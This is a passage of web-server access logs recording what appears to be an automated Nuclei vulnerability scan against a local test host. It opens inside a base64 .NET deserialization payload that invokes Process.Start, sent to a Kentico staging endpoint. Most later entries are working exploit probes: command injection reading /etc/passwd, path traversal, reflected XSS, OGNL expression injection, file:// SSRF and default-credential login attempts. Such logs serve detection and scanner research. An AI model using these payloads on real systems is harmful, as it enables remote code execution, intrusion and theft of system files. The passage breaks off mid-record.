waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.769","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.235","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.239","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.140","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.299","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /__clockwork/app HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.289","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /s/28fHqXmD5yiMAvPWqSR07y0XTJj/_/;/WEB-INF/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.688","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.122","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /remote/login?&err=--%3E%3Cscript%3Ealert('28fHqVoxeuQFTYPTMDdXqsWmXOF')%3C/script%3E%3C!--&lang=en HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /download.do?file=../../../../config.text HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /service/rest/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.116","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/altair HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/geojson?url=file:///etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; 